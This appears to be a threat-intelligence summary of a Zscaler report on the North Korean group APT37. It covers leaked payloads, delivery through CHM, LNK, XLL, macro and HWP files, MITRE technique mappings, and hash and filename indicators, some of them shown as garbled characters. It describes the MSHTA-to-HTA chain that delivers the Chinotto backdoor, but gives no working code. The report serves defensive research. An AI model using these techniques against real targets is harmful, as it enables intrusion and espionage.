Zscaler ThreatLabz analyzes APT37 (ScarCruft/Temp.Reaper), a North Korea-based threat actor targeting South Korean organizations, with activity noted in early 2023. The investigation reveals a GitHub leak exposing a wealth of malicious payloads and multiple attack vectors (CHM, XLL, LNK, macro-based MS Office, HWP), including previously undocumented themes and decoy content. #APT37 #ScarCruft #Temp.Reaper #Chinotto #PowerShell #Mshta #LNK #XLL #CHM #HWP #LGUplus
Keypoints
- APT37 is a North Korea-based APT targeting individuals in South Korean organizations.
- The GitHub repository exposure reveals numerous payloads and attack vectors dating back to October 2020.
- Attack vectors include CHM, MS Excel Add-in (XLL), LNK, macro-based MS Office documents, and HWP with embedded OLE objects.
- Decoy themes span geopolitics, South Korean companies, academia, and finance to lure victims.
- For C2, the group often leverages South Korea-based bulletin board system (BBS) sites.
- The group resumed activity in Jan 2023 and continues spear phishing; threat actor deletes files from GitHub to evade detection.
MITRE Techniques
- [T1566.001] Spearphishing Attachment โ Initial access via CHM and archive-contained decoys used to deliver Chinotto backdoor. โThe decoy files are password-protected. The password to open the decoy file is displayed by the CHM file.โ
- [T1105] Ingress Tool Transfer โ CHM loader downloads a malicious HTA file from the attackerโs server and executes it. โdownload a malicious HTA file from the attackerโs server and executing it.โ
- [T1059.001] PowerShell โ The HTA file contains the PowerShell backdoor called Chinotto. โThe HTA file contains the PowerShell backdoor called Chinotto.โ
- [T1023] LNK โ LNK files recovered from GitHub were used to execute MSHTA and download the malicious HTA file. โthese LNK files were used to execute MSHTA and download the malicious HTA file from the attackerโs server.โ
- [T1059.005] Visual Basic โ Macro-based MS Office Word file uses VBA macros to launch MSHTA and download the HTA file. โThis macro would launch MSHTA to download the PowerShell-based Chinotto backdoor as well.โ
- [T1218.005] Mshta โ MSHTA is used to download and execute the HTA payload that hosts the Chinotto backdoor. โLaunches MSHTA to download an HTA file from the URL: โฆโ
Indicators of Compromise
- [MD5 hash] Archive file hashes โ 3dd12d67844b047486740405ae96f1a4, e9cd4c60582a587416c4807c890f8a5b, and many more hashes
- [MD5 hash] CHM file hashes โ 914521cb6b4846b2c0e85588d5224ba2, 2ffcb634118aaa6154395374f0c66010, and many more hashes
- [MD5 hash] LNK file hashes โ eb7a6e3dc8bbc26f208c511ec7ee1d4c, c5f954436e9623204ed961b9b33e769d, and many more hashes
- [MD5 hash] XLL file hashes โ 82d58de096f53e4df84d6f67975a8dda, and other hashes
- [MD5 hash] HWP file hashes โ a4706737645582e1b5f71a462dd01140, and many more hashes
- [Filename] Archive filenames โ (20220120)2022๋ ์ด๋์ฐฝํ ์ ๋ ์ธ์ฌ001.rar, (์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).rar, and many more
Read more: https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37